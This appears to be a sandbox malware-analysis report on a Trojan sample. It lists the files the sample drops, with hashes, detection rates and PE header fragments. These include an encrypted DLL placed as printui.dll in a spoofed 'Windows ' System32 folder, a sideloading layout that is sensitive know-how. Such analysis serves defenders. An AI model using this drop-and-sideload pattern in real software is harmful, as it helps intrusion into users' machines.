                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1rukumt.5ez.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydihriht.14y.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh3qwo5l.k4a.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z02q04tc.msh.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgkzou2o.se2.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkrf1ny0.zet.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztexvgmx.hai.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxm3julf.3cz.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\Desktop\curlapp64.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):614912
                                                                                                                                                                                                Entropy (8bit):6.60454556327044
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:R4Jol6Uw0xtsF10nnWHO8VVph0lhSMXliatZDp1Gyt:6uVzE1wnWHDnh0lhSMXlJZDF
                                                                                                                                                                                                MD5:F9830DF1DFDB31CEC5E3BD9F892EDC9A
                                                                                                                                                                                                SHA1:073E56D2FBEF94DD6FDFC1FF1FE12ECC71736029
                                                                                                                                                                                                SHA-256:9C40291F6A315E70B45AD05F9671D7EEA89AB14AECEBF42CE9BA4C167509C9E5
                                                                                                                                                                                                SHA-512:5CFFA490084DA873F341B4B88C3B92D9B25D1BA9E9A28E5D249037C2CB3FA27348D4F2EB770E274C3BAB47C69EAF942F118C25ECA47B6216CFF3C492C815A885
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...^..^..^..H[...^..HZ..^..H]..^.M]..^.MZ..^.M[...^..L_..^..H_..^.._.(.^..LW..^..L...^..L\..^.Rich..^.........................PE..d...~.'g.........."....).z...........>.........@..........................................`.....................................................P............P...B...................l..8............................j..@...............X............................text....x.......z.................. ..`.rdata...u.......v...~..............@..@.data....1..........................@....pdata...B...P...D..................@..@.fptable.............R..............@....rsrc................T..............@..@.reloc...............V..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\Desktop\libcurl.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):588800
                                                                                                                                                                                                Entropy (8bit):6.3852695857936554
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                                                                                                                                MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                                                                                                                                SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                                                                                                                                SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                                                                                                                                SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: app64.exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\Desktop\prnttemp.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15149056
                                                                                                                                                                                                Entropy (8bit):7.999920101106119
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:393216:ruN0/uGKXoPltcqOroISNJOahJxHinLdbcPEI+xE07c8ZhMlGnPt3u2:DuGKYttorozJBinZbcPl0Iy6GnPte
                                                                                                                                                                                                MD5:BB5759098C8B3F72F5F53604DE1509C8
                                                                                                                                                                                                SHA1:3B844227130741A15A4F6B07584F176C6327162D
                                                                                                                                                                                                SHA-256:1ED61ED67858BF672CF6AACFD440A2124C9039FBF1594622200B5205A2867ED5
                                                                                                                                                                                                SHA-512:2567505FFD64259747168D079ABF906404855C859FAFD85CE73173E11A0099629D9EA3A131CBE92CFFCE78ACBCEED565E9D3EEFA046F85B636A91342B9CB5F1D
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.(g..........."...'.B...$...... ..........E....................................X.....`... ......................................`..^....p..P............0.............................................. *..(....................r...............................text....A.......B..................`..`.data...p....`.......F..............@....rdata....... ......................@..@.pdata.......0......................@..@.xdata.......@......................@..@.bss....0....P...........................edata..^....`......................@..@.idata..P....p......................@....CRT....X............"..............@....tls.................$..............@....reloc...............&..............@..B........................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\Desktop\zlib1.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):90624
                                                                                                                                                                                                Entropy (8bit):6.509332615593886
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                                                                                                                                MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                                                                                                                                SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                                                                                                                                SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
                                                                                                                                                                                                SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: app64.exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows \System32\printui.dll (copy)

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15149056
                                                                                                                                                                                                Entropy (8bit):7.999920101106119
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:393216:ruN0/uGKXoPltcqOroISNJOahJxHinLdbcPEI+xE07c8ZhMlGnPt3u2:DuGKYttorozJBinZbcPl0Iy6GnPte
                                                                                                                                                                                                MD5:BB5759098C8B3F72F5F53604DE1509C8
                                                                                                                                                                                                SHA1:3B844227130741A15A4F6B07584F176C6327162D
                                                                                                                                                                                                SHA-256:1ED61ED67858BF672CF6AACFD440A2124C9039FBF1594622200B5205A2867ED5
                                                                                                                                                                                                SHA-512:2567505FFD64259747168D079ABF906404855C859FAFD85CE73173E11A0099629D9EA3A131CBE92CFFCE78ACBCEED565E9D3EEFA046F85B636A91342B9CB5F1D
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.(g..........."...'.B...$...... ..........E....................................X.....`... ......................................`..^....p..P............0.............................................. *..(....................r...............................text....A.......B..................`..`.data...p....`.......F..............@....rdata....... ......................@..@.pdata.......0......................@..@.xdata.......@......................@..@.bss....0....P...........................edata..^....`......................@..@.idata..P....p......................@....CRT....X............"..............@....tls.................$..............@....reloc...............&..............@..B........................................................................................................................................................................

                                                                                                                                                                                                C:\Windows \System32\printui.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64000
                                                                                                                                                                                                Entropy (8bit):6.336447440888565
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                                                                                                                                MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                                                                                                SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                                                                                                                                SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                                                                                                                                SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\bav64.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):517632
                                                                                                                                                                                                Entropy (8bit):6.546404385017312
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:zomD49OZtD8z3Td1sZZ2ePiph0lhSMXliZcji3L:smoGlZZ2Xh0lhSMXlicj
                                                                                                                                                                                                MD5:54EEFA1EAEAB32575A1BDF407327C5DA
                                                                                                                                                                                                SHA1:EBC9D8C116257CD31542CAEA640C71BEDDDB62EB
                                                                                                                                                                                                SHA-256:6E233178723C58A354F9559A2D621D77A9D4FAEF9B212349170D337DD16D12BF
                                                                                                                                                                                                SHA-512:6F0D89349379845B27CFFB7598C745C28D5F223D6B368A9932F778D397A262AD54D763BB8A50F590EA204EF61FD69233897EC2ED092124ADD668933F586E7DD6
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.#X.fM..fM..fM.y.H..fM.y.I..fM.y.N..fM...N..fM...I..fM...H.RfM.y.L..fM..fL..fM.y.K..fM.B.D..fM.B...fM.B.O..fM.Rich.fM.........................PE..d.....(g.........."....).&.....................@.............................P............`.................................................L...x....0...........;...........@..........8...........................`...@............@...............................text....$.......&.................. ..`.rdata...U...@...V...*..............@..@.data...42..........................@....pdata...;.......<..................@..@.fptable..... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                C:\Windows\System32\console_zero.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):664064
                                                                                                                                                                                                Entropy (8bit):6.600432864562189
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:t8g4fg+kOWS/HkLNsFZVfuqF6ph0lhSMXliSRO0N:tB4oc/eCjVfuth0lhSMXl1RO
                                                                                                                                                                                                MD5:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                                                SHA1:E7ED11FD5E1433527B49E9A6F599829EFD3F2720
                                                                                                                                                                                                SHA-256:41B32CEC90F5AF34F5290B2A6556432948027D8C0C18A6A715AE36D71BEC1A50
                                                                                                                                                                                                SHA-512:63D6027989CE97CCF17474CA7CDD0DAA4DE54BFD62F3F622BD9610E847B0B22B37B016168F3C1E3FD6EE019EB13A955494CD51FE291EBEA30B2AFE0729D0840A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.1.i._Si._Si._S.MZR.._S.M[Rz._S.M\Ro._SyH\Rc._SyH[Ry._SyHZR1._S!I^Rk._S.M^Rl._Si.^S.._S"IVRk._S"I.Sh._S"I]Rh._SRichi._S........................PE..d...zW.g.........."....).......................@..........................................`.....................................................P....`...........K...........p..T.......8...............................@............0...............................text............................... ..`.rdata.......0......................@..@.data....3..........................@....pdata...K.......L..................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc..T....p......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\libcrypto-3-x64.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4684800
                                                                                                                                                                                                Entropy (8bit):6.761708409908653
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                                                                                                                                MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                                                                                                                                SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                                                                                                                                SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                                                                                                                                SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\libcurl.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):588800
                                                                                                                                                                                                Entropy (8bit):6.3852695857936554
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                                                                                                                                MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                                                                                                                                SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                                                                                                                                SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                                                                                                                                SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\libiconv-2.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1851113
                                                                                                                                                                                                Entropy (8bit):6.295735352298234
                                                                                                                                                                                                Encrypted:false
